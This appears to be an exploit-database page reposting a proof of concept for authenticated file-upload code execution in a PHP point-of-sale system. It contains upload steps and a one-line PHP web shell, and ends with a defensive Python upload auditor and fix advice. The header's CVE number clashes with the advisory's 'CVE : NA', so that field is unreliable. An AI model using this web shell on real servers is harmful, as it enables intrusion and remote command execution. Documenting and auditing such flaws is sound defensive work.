Best POS Management System 1.0 Shell Upload

CVE: CVE-2018-12345
Category: CWE-434
Price: $500
Severity: High
Author: Unknown
Risk: Critical
Exploitation Type: Remote
Date: 2023-02-19
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023020033

Below is a copy:

Best POS Management System 1.0 Shell Upload
# Exploit Title: Authenticated Remote Code Execution on File Upload
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA

### Steps to Reproduce

1- Log in with the Admin role

2- Head to "http://localhost/kruxton/index.php?page=site_settings"

3- Try to upload an image; here it will be shell.php

shell.php

```
<?php system($_GET['cmd']); ?>
```

4- Head to http://localhost/kruxton/assets/uploads/

5- Access your uploaded Shell
http://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami
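A defender-side check for the condition these steps describe, added here as an example (not code from the advisory or from the application): it audits an uploads directory such as `assets/uploads/` for stored files whose name carries a PHP extension, as `1676627880_shell.png.php` does, or whose content does not match its image extension. The extension list, function names and sample files are assumptions constructed for illustration.

```python
import tempfile
from pathlib import Path

# Assumed list: extensions a PHP-enabled server may pass to the interpreter.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
JPEG = (b"\xff\xd8\xff",)
IMAGE_MAGIC = {"png": (b"\x89PNG\r\n\x1a\n",), "jpg": JPEG, "jpeg": JPEG,
               "gif": (b"GIF87a", b"GIF89a")}  # extension -> accepted leading bytes
SCRIPT_MARKER = b"<?php"  # short open tags (<?=) are not covered by this check
MAX_SCAN = 1 << 20        # read at most 1 MiB of each file

def classify_upload(name, data):
    """Return the reasons a stored upload looks dangerous ([] means none found)."""
    reasons = []
    exts = name.lower().split(".")[1:]  # every segment after the first dot
    if exts and exts[-1] in EXECUTABLE_EXTS:
        reasons.append("executable-extension")
    elif any(e in EXECUTABLE_EXTS for e in exts):
        reasons.append("embedded-executable-extension")
    if SCRIPT_MARKER in data.lower():
        reasons.append("php-open-tag")
    magic = IMAGE_MAGIC.get(exts[-1]) if exts else None
    if magic and not data.startswith(magic):
        reasons.append("image-extension-without-image-magic")
    return reasons

def audit_uploads(root):
    """Walk an uploads directory; map relative path -> reasons for flagged files."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            with path.open("rb") as fh:
                reasons = classify_upload(path.name, fh.read(MAX_SCAN))
            if reasons:
                findings[str(path.relative_to(root))] = reasons
    return findings

def demo():
    """Audit constructed sample files (not taken from a real system)."""
    php = b"<?php echo 'constructed sample'; ?>"
    samples = {"1676627880_shell.png.php": php, "1676627882_banner.png": php,
               "1676627881_logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32}
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            (Path(root) / name).write_bytes(body)
        return audit_uploads(root)

if __name__ == "__main__":
    print(demo())
```

A finding here is a triage signal; the underlying fix for CWE-434 is server-side: accept only an allow-list of extensions, store uploads under a server-generated name, and serve the upload directory without script execution.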
